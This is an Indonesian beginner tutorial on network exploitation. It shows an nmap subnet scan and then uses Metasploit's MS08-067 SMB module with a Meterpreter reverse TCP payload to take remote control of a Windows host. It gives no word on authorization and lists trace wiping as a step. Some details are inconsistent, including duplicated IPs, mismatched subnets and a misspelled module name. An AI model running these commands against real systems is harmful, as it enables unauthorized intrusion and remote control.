Basic Exploitation

, ,

Exploitasi adalah sebuah pemanfaatan vulnerable system yang memungkinkan terjadinya remote system olehuser yang tidak terautentikasi. Dalam dunia exploitasi, software yang terkenal untuk exploitasi adalahmetasploit. 


Exploitasi memang terdengar sulit, namun pengaplikasiannya sangat mudah. Kita cukup mengenal siklus hackerbekerja, yaitu:
  1. Information Gathering
  2. Vulnerability Assessment
  3. Gaining Access
  4. Maintaining Access
  5. Wiping Trace
Pertama kali, kita harus mencari informasi target. Dalam Backtrack, hal ini bisa dilakukan dengan menggunakan nmap. Untuk memahaminya, gunakan command:


Code:
root@blusp10it:~# nmap 172.16.128.1/24

Command ini berfungsi untuk melakukan scanning pada network dengan kisaran IP => 172.16.128.1sampai 172.16.128.255.


Terlihat pada hasil scan nmap, ada dua host yang up yaitu:
  • 172.16.128.1 [ip saya]
  • 172.16.128.1 [ip target]
Kemudian langkah selanjutnya adalah melakukan scanning pada host yang up dengan nmap. Command dasarnya adalah:


Code:
root@blusp10it:~# nmap [ip-host]

    Jika target host kamu adalah 172.16.129.128, maka gunakan:


    Code:
    root@blusp10it:~# nmap 172.16.129.128



    Terlihat bahwa host 172.16.129.128 memiliki tiga port yang terbuka yaitu:
    • 135
    • 139
    • 445
    Dan menggunakan sistem operasi Windows dengan port 445 yang terbuka. Langkah berikutnya adalah menentukan exploit yang bisa digunakan untuk memicu vulnerability. Untuk melihat exploit yang bisa digunakan, bukalah console metasploit dengan command:


    Code:
    root@blusp10it:~# msfconsole




    Code:
    msf > show exploits 



    Untuk sistem operasi Windows XP dengan port 445 yang terbuka, kita bisa menggunakan modul exploit ms08_06_netapi

    Gunakan perintah:



    Code:
    msf > use exploit/windows/smb/ms08_067_netapi


    Setelah itu gunakan payload, sebagai penghubung exploit dengan remote system. Untuk melihat payload yang bisa digunakan, gunakan perintah:



    Code:
    msf  exploit(ms08_067_netapi) > show payloads




    Code:
    msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp


    Perintah ini akan membuat exploit berinteraksi dengan meterpreter melalui TCP. Setelah itu, set local remote yang akan dijadikan base exploit. Gunakan commmand:



    Code:
    msf  exploit(ms08_067_netapi) > set LHOST 172.16.129.1


    Perlu diperhatikan, untuk local remote, gunakan IP kita sendiri.


    Kemudian, tentukan remote host atau IP target exploitasi. Gunakan perintah:


    Code:
    msf  exploit(ms08_067_netapi) > set RHOST 172.16.129.128


    Setelah itu, cek kembali dependency modul yang akan diekseskusi dengan menggunakan perintah:


    Code:
    msf  exploit(ms08_067_netapi) > show options


    Setelah semua options terisi dengan benar, lakukan eksekusi eksploitasi dengan perintah:


    Code:
    msf  exploit(ms08_067_netapi) > exploit


    Terlihat bahwa metasploit langsung berinteraksi dengan modul payload meterpreter.

    Dengan peyload meterpreter yang telah aktif, berarti kita telah berhasil melakukan eksploitasi. Cukup kali ini basic exploitation yang saya sampaikan. Berikutnya akan ada basic meterpreter untuk memahami basic command meterpreter.